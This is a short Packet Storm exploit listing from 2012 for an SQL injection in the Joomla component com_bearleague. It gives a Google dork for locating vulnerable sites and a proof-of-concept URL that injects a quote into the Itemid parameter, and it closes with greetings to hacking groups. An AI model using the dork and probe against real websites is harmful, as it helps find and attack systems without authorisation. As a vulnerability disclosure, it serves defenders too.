Joomla Bearleague SQL Injection

2012-04-11T00:00:00
ID PACKETSTORM:111748
Type packetstorm
Reporter xDarkSton3x
Modified 2012-04-11T00:00:00

Description

                                        
                                            `##################################################  
# Exploit Title: joomla component (com_bearleague) SQL injection Vulnerability  
# Date: 10/04/2012  
# Author: xDarkSton3x  
# E-mail : xdarkston3x@msn.com  
# Category:: webapps  
# Google dork: inurl:com_bearleague  
# Vendor: http://beardev.com/component/joobb/topic/220-BearLeagueforSnookerorindividualSports.html  
# Tested on: linux + windows  
##################################################  
  
[~]Exploit/p0c :  
http://site.com/index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27  
  
Greetz [ Rs4 - B4nz0k - FailRoot - FailSoft - W4rn1ng] - [ Malandrines Team - DiosdelaRed.Com - RemoteExecution ] [ Dedalo - Maztor ]  
  
  
  
  
`